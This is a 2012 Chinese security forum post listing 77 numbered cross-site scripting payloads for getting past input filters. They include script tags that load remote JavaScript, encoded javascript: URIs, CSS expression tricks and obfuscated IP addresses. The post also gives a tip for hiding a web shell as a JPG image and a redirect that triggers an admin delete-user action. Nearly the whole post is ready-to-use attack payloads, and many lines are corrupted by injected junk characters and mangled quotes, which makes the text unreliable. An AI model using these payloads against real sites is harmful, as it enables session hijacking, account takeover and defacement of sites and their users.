找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2232|回复: 0
打印 上一主题 下一主题

xss详细利用大全1

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:04:56 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
跨站图片shell
# m% \7 S2 {1 N6 o: T  T$ ?XSS跨站代码  <script>alert("")</script>) }* W1 H" K3 b  |

( z3 P7 K0 }) B0 f; T1 m8 p将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
% \5 ^: R; c2 q3 |, a# {  p7 y. G, J" C

2 M9 X& i- j9 {; d( `$ G+ ?% f# K" l% U# P- i# a2 `& i1 Y7 u( m
1)普通的XSS JavaScript注入
2 X* z: g& J5 A% e" U6 v<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>9 o8 A( u6 \  F' y7 y, F2 d% w6 x

# p2 P0 I& Q+ t(2)IMG标签XSS使用JavaScript命令
8 B* {; J+ X; h" Z3 X# h. p" C<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
6 s+ R0 p9 m" ^7 j* R! x
* W; S: L9 u/ [+ b  e(3)IMG标签无分号无引号
" D9 _0 z3 u# N<IMG SRC=javascript:alert(‘XSS’)>1 q* O# I! b, A  m) C
* ?( w8 L3 X5 N! V9 l
(4)IMG标签大小写不敏感4 W) V( S! T# z/ C
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
5 I: r5 l$ {9 F6 g* f& ~6 H4 v5 z9 D
(5)HTML编码(必须有分号)1 t) N! G5 X; `
<IMG SRC=javascript:alert(“XSS”)>
  Z/ E$ Y# N, g3 @" D7 Z1 w- P8 ]
+ }8 y, {! _* Z" Y0 f0 z(6)修正缺陷IMG标签7 ^' S1 Q# N0 ]* _- r0 a2 s
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>/ g" z2 D8 _, b$ u- _, q: a
+ V6 h0 Q5 g6 ^% [6 E# R5 F. z
(7)formCharCode标签(计算器)
0 K2 p- b; c) q  I<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>! r* C( z; v$ c8 ?4 c
) C4 M; ?0 G9 M) Q0 ?$ L5 Y: X
(8)UTF-8的Unicode编码(计算器)
- `& ^. y# @# W! |$ c# l6 g6 S3 y<IMG SRC=jav..省略..S')>" K# G: T! _: f/ k/ n7 t8 k
9 }+ [$ @, R& V  m) o2 l
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
/ K  |% m) h" N; g+ x, d" x<IMG SRC=jav..省略..S')>; U6 N+ T8 ~* T% T

! R3 u& W( x8 v% R(10)十六进制编码也是没有分号(计算器)
. P( C' p( F. }8 c9 I<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>7 @8 g  ~- c* _- ?  `' v
4 t) V; i- z  L$ I5 t8 P- l
(11)嵌入式标签,将Javascript分开
1 b/ H* S) ]7 K" U* n2 U& S<IMG SRC=”jav ascript:alert(‘XSS’);”>3 o0 q# M7 \& r5 B" ~
8 d( a! i* d; F2 y
(12)嵌入式编码标签,将Javascript分开* u" ~1 G' M" J9 F
<IMG SRC=”jav ascript:alert(‘XSS’);”>2 a: s3 s; Q$ g

" E' W4 \$ A5 J: U(13)嵌入式换行符, N! J8 t7 G8 E% K9 ^* C
<IMG SRC=”jav ascript:alert(‘XSS’);”>
# {  l+ N- R6 {2 x# q) Q% n# j! Z9 x+ v( x) e
(14)嵌入式回车4 R% `9 ?( v$ |0 |3 N# C
<IMG SRC=”jav ascript:alert(‘XSS’);”>
9 h" z6 k1 [2 E6 P+ p: z
. i& w! l2 _2 b0 d4 B( ]6 l" O/ ](15)嵌入式多行注入JavaScript,这是XSS极端的例子! y/ g% o0 ]1 w9 Y& ]& E2 m0 q! `
<IMG SRC=”javascript:alert(‘XSS‘)”>$ f' v0 ~" s) H0 x; I. B

' l8 x; J  h6 H(16)解决限制字符(要求同页面): R6 A) e- F" H& ?6 q4 ]" E
<script>z=’document.’</script>7 y2 `3 a/ h5 G4 `
<script>z=z+’write(“‘</script>" g3 `! R, l6 Q$ V' j9 {) g
<script>z=z+’<script’</script>7 {. x2 P$ m- w) o: E7 z% a% E
<script>z=z+’ src=ht’</script>
5 v+ B3 r6 V' m0 {<script>z=z+’tp://ww’</script>
+ F% S2 z- I; ~<script>z=z+’w.shell’</script>
! i% j; M. I! W) @7 O<script>z=z+’.net/1.’</script>. Z) Y, G% v4 n# R1 \3 r
<script>z=z+’js></sc’</script>- l0 T! p; r% R
<script>z=z+’ript>”)’</script>
# {5 B% U- p) @+ c; D( W0 X" Z<script>eval_r(z)</script>
  Y, U0 U, Z2 e% m, m7 K! r/ w' j. z
" G/ D$ a+ M% A8 t(17)空字符, G, ]- ?' u4 ^! x/ e! e1 d! F
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out' G5 p' v' I1 Z% [5 ^

( Q' \/ ^' e' R0 L2 X(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
' J- K5 {& p8 o- a& k. xperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out3 d; R0 ?0 p) [$ {! f
0 ~1 P- ~' P$ S" ]5 L! L
(19)Spaces和meta前的IMG标签
+ ~* @  ?: B+ I<IMG SRC=” javascript:alert(‘XSS’);”>5 K$ F- r( P9 C4 N

  U8 ?$ Q% E  U% \2 n" H7 K(20)Non-alpha-non-digit XSS
7 G+ q; V( s9 `4 q& ?/ p<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>( [9 c: |1 w! e
! S  |- {) d% b( Z! o5 L$ ~
(21)Non-alpha-non-digit XSS to 2
) L9 T, b* B. b0 _6 X1 }<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
' y- V6 G6 d3 X" e1 N
; r$ d% R5 \, q! L5 X9 T# X(22)Non-alpha-non-digit XSS to 3
. W8 x% S/ _4 j/ F2 _<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
; r& z. R8 @: f# T: ]) _) c4 v& x
( j2 m, Q( r  }3 j  g% ?(23)双开括号
/ ~+ i$ o5 f$ ~9 q! @7 p<<SCRIPT>alert(“XSS”);//<</SCRIPT>
+ [" {' M$ v& P4 U* M; l  q- V3 Z
(24)无结束脚本标记(仅火狐等浏览器)
9 I% f! w! ?+ Y/ u. G" O<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
* Z$ g5 y. z! L3 J" i
: T/ @' c# B9 N  v7 u2 i(25)无结束脚本标记2
7 @. l9 v& b% Y% f5 h6 D& p<SCRIPT SRC=//3w.org/XSS/xss.js>
: a2 V3 g# i$ t4 B, F
9 a% w4 e, k0 a  v* e; Z) M(26)半开的HTML/JavaScript XSS
; X8 ]6 E7 q  y" ^1 ]( }, W<IMG SRC=”javascript:alert(‘XSS’)”3 g+ M6 l3 I0 U

2 e" I4 S, n9 x7 y1 O, w* d2 K  ?  u(27)双开角括号$ g$ ^- U. T+ B- R$ F+ ]
<iframe src=http://3w.org/XSS.html <
7 I! _7 L2 p/ _( U- A8 J4 p7 ]5 k  n% M( c0 S; I4 L
(28)无单引号 双引号 分号
. Q3 `9 o0 R' h3 x  M2 R9 O<SCRIPT>a=/XSS/2 D' Y! G# {" h2 U1 G0 `. E
alert(a.source)</SCRIPT>, h7 X, s2 i! R2 M
  s3 N, x& x, Z" `
(29)换码过滤的JavaScript
9 M2 R9 r, N& x+ c/ b\”;alert(‘XSS’);//
+ l  \# _4 m' y; X
# F$ v2 R, p9 Y% j0 T* n& Q. _(30)结束Title标签
' c6 ~& N" s, F: z; {</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
# d: h6 K$ y* E. `2 u' h) ]. _! e+ p  n+ [% K
(31)Input Image
6 w. j) f+ j# N  O, C/ ^$ p, n' D<INPUT SRC=”javascript:alert(‘XSS’);”>) J9 b, U6 o  `) q7 X; k8 g& B0 F% Z+ v

* v8 L+ [' p/ C. v. m9 A(32)BODY Image. o0 l! H6 h. X* n* l( H
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>* D. _# ?6 a) e: [4 E0 n6 j
8 |3 Q8 Y& w9 t4 A- i6 S
(33)BODY标签9 T( ?1 v8 J( _/ c8 ^, }% R
<BODY(‘XSS’)>$ }$ _1 P0 L( R
/ a2 L: q7 b+ I! U% Z1 \- B
(34)IMG Dynsrc3 Q' H- {" E) @. r' O& g- u8 J
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
4 }- l/ O% s, @" q. M1 C
. k4 V1 K0 X! Y+ X(35)IMG Lowsrc
; g4 Q- x( M% m<IMG LOWSRC=”javascript:alert(‘XSS’)”>6 w! r( M* r9 q  B

/ ^. n0 w9 E8 ]! Z4 P1 V(36)BGSOUND
% t/ g$ Z( {6 M7 ~; T+ t8 ~: I<BGSOUND SRC=”javascript:alert(‘XSS’);”>9 e8 |. u4 v# f- ~% T

8 j! v/ a1 k6 m) I* l(37)STYLE sheet! u/ u% ]) n! j( g1 }) h
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
/ E2 o8 _) B2 \- E4 y5 c  G1 |
1 {: e* o/ t  s$ k8 f(38)远程样式表
9 H8 Y3 a, P- R$ D<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
3 Q7 q  u- S5 j7 t& t
7 `2 |+ F% I! ]+ w(39)List-style-image(列表式)& C' p0 c& r) P' F2 Q; \
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
- L. C, e0 q- q3 W
( _5 y; K. n/ _(40)IMG VBscript* S+ I; {, F5 q4 I6 e6 d7 S
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
6 S, U  K% q+ @/ m! Q9 p) x7 U
(41)META链接url
) }  H. G- ^2 n<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>; `, O' Z- q/ M, @# v

& N3 o, L! g0 |* E' u(42)Iframe- J% ~5 W) Q1 g' G" P  ~
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>2 F/ D" `8 B( g
(43)Frame' B1 p' T5 c" q5 c$ G6 N+ b
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
. X2 X' G* C# Q. w1 U  z8 n+ A1 n- f% D- _6 _1 T) l
(44)Table8 C, n) S. Q3 U( E' y8 N! e1 q* Z, D9 y
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>) J7 S% D" B0 i; {4 I7 M7 R0 t
: f+ _" m5 w. l9 y
(45)TD, n/ V& ]; ~4 _  ?. ^5 L  N6 z
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>% t( T) Y: m/ H* o" P2 D( |

3 K) [: K3 ~4 o: j# j(46)DIV background-image; {1 N$ `: R2 U0 k: `8 {( h, u. R9 U
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>- S# L* n  F# y
) m; Z! u! ?) q# g7 i
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
/ c- z. j7 M/ a! O" l. x: [0 _<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>% B/ n# l9 ~5 G; a* t

+ q6 V3 W5 D) g9 g# |. t* [2 L5 ](48)DIV expression
# I# q/ M$ C8 d<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
1 P2 v- P( H* W( \! w8 K( L$ s6 y3 U6 ^- b0 v
(49)STYLE属性分拆表达# _' X5 P1 R0 w
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>+ V0 A& S9 z; O: J$ c* n

8 g, E6 t) o4 `: p4 K# o(50)匿名STYLE(组成:开角号和一个字母开头)
4 h" ?8 |. h, L+ P  N<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
; w5 H2 c' ?' g3 ?
! N" |; i% t) O) W; {4 W3 t(51)STYLE background-image
3 v% U0 C+ Z1 t6 U<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
6 A& ^9 f. D0 S/ C6 B, C4 q; I3 a1 t$ @1 o* Y
(52)IMG STYLE方式7 ?) d/ D/ Z! M3 v& [
exppression(alert(“XSS”))’>. I  `" f/ I" Y& y

5 ?0 z1 [8 K- Z+ g(53)STYLE background
8 H" v8 |% r. g+ j6 x; A0 }0 }1 ?<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>3 G9 f- n* N; N# b
! a# z$ t; g  x+ L4 @
(54)BASE/ f6 Z% M+ f3 x  |! ]
<BASE HREF=”javascript:alert(‘XSS’);//”>, Z1 @( _1 r8 Y! U
) h1 K) B' Q, e3 \* T
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS8 o6 l9 b1 ]- N9 K2 [; h
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
( S  ^% Z5 H, n) [
1 n1 Q1 n7 K2 c; [7 W3 g(56)在flash中使用ActionScrpt可以混进你XSS的代码
; S& J- R1 m1 Y* g; j- R: ^a=”get”;
/ L/ K5 E8 H4 J  ^1 pb=”URL(\”";0 s! e7 C0 }5 _8 O/ \, E" U
c=”javascript:”;1 ]' \* z" Y% `% W7 j6 J
d=”alert(‘XSS’);\”)”;' ?  H% i& A  E9 k5 F3 O4 y! C
eval_r(a+b+c+d);; Y2 v: @  c6 Q& t1 [' ^

0 }$ c; T; u4 [1 I% K(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
) n2 T5 i3 C4 `2 c) _, o5 Y* K<HTML xmlns:xss>
7 z$ T7 t0 @; l9 ~& q- {+ n' ~<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
9 f8 k8 F* S1 h6 r% R) W/ L<xss:xss>XSS</xss:xss>' b, s9 A8 h7 E% W) S1 h' K/ X# f# n
</HTML>
9 o& y. p! V$ P/ P* j$ ~9 f
9 U: {1 i% }( J6 w$ c(58)如果过滤了你的JS你可以在图片里添加JS代码来利用0 x9 G2 o, w  b( e: A
<SCRIPT SRC=””></SCRIPT>4 @& |3 Z  J3 d  h, p- o  d
6 l" a$ a: V# F- H, g9 d
(59)IMG嵌入式命令,可执行任意命令5 D; M! d3 l* |) E8 X$ s* k9 b
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
" |: d, ]" E! _% d: Y2 l0 K: _- a" S- P8 v5 g( A& R+ U2 C
(60)IMG嵌入式命令(a.jpg在同服务器); x  Z$ O7 @6 ^! t7 c4 N
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
  X8 P2 @. C- y2 u+ s% o; s7 l, N, l7 C7 Q7 m7 H. U2 @, E. u; O
(61)绕符号过滤
* z9 f& R) P; O" h<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>) T5 K/ V1 Z3 b  X9 t% t, f4 n

* R0 d# X! q" z4 Y7 y$ m(62)
9 W# U, v7 V; f' C<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>  g$ l9 s0 @3 d
0 h3 R, O% m8 {+ G) H5 T7 \/ J7 |
(63); \1 x: _* ^! z) R
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
7 m& w3 Q3 R( z' k
  k' |" H; {  V7 z% F! ~& c. \8 {(64)" z  D% m8 E0 E( z3 {- E
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>4 e; x7 K& K' ~, `# o& W7 u
+ ?/ G0 u' s  {6 M- m! m
(65)% S' r( H* H( n! s6 P4 L
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
, f: Q( o+ M( W& v6 r( a
; {% v+ |& n- y(66)& w/ Z+ U4 i9 k' S) T
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>* @- |: b: d2 B

* {1 @0 J; C- G( f2 y: r(67)
+ u& p% ]8 u/ t* R; S; ^& ^- t<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>+ c2 I) Z0 x" M8 F# ^) Z
+ m& U* O6 }1 G1 t
(68)URL绕行2 `( W4 E$ G" E" b0 V, `& ?
<A HREF=”http://127.0.0.1/”>XSS</A>
1 j5 B( V0 E3 v; X
: _" u* D- B8 f& @  t4 e6 f; W! |  R(69)URL编码
; r0 S9 C$ g2 S2 Z<A HREF=”http://3w.org”>XSS</A>
- l/ {+ S# D5 I- L3 v/ Q
' \) |0 b! w2 W, i+ t7 D  G0 w% L, }2 d(70)IP十进制
" r4 T) A, O9 C# g( w6 P<A HREF=”http://3232235521″>XSS</A>* d0 z0 G; E  d$ a! U# j

/ v4 p" `3 y. l7 l- U) y6 f. Q(71)IP十六进制9 S/ p' W. C8 g8 _3 S& Q2 M
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
% V7 V! H. G% \3 M8 d, D3 O# U. l! x+ ], m! l& g
(72)IP八进制
$ {4 e% ]1 W  X, j0 [3 g/ K<A HREF=”http://0300.0250.0000.0001″>XSS</A>$ s( b; ?0 K8 ]1 b
, u( ]. x5 c  e  ^; d' ?
(73)混合编码* P% I3 P1 |. k$ R
<A HREF=”h0 m" {. t7 u# l3 \  ^. ^5 X. W
tt p://6 6.000146.0×7.147/”">XSS</A>
' P+ y/ l; z( k) M+ @1 S; G. T; |8 N. X8 |" u
(74)节省[http:]% D7 \" ]! u/ `
<A HREF=”//www.google.com/”>XSS</A>/ c1 {9 S4 I4 B5 Z! O

% M' C& I" Z6 p+ W(75)节省[www]
# V/ T, b' M: x) W& L: M<A HREF=”http://google.com/”>XSS</A>/ T+ b% C3 i. e1 m2 s% Y1 J

! ?2 P! e( P& R( s1 x(76)绝对点绝对DNS
- z, m6 F& P' _: B7 Y<A HREF=”http://www.google.com./”>XSS</A>. p" c) M0 a* Z$ y* s. h

' i, j( ~: {! ]' b; F(77)javascript链接/ M7 x4 }+ [. T. w
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>" ?% N. J2 X9 L$ G; V1 ]) q, Z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表